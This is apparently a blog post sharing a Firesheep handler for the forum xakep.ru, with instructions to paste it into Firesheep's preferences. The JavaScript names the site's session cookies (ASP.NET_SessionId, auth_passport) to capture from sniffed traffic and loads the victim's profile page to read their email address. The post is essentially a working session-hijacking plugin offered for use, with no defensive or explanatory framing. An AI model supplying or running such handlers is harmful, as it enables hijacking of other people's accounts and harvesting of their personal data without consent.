Go to Firesheep -> Preferences -> Websites -> and Add this code :
// Author
// cityZombie <chebon9@gmail.com>
// For more handlers visit : http://firesheepfan.blogspot.com/
register({
name: "Xakep.ru",
url: 'http://forum.xakep.ru',
domains: [ 'xakep.ru' ],
sessionCookieNames: [ 'ASP.NET_SessionId','auth_passport' ],
identifyUser: function () {
var req = this.siteUrl + "/editprofile.aspx";
var resp = this.httpGet(req);
this.userName = resp.body.querySelector("input[name='emailori']").value;
}
});
No comments:
Post a Comment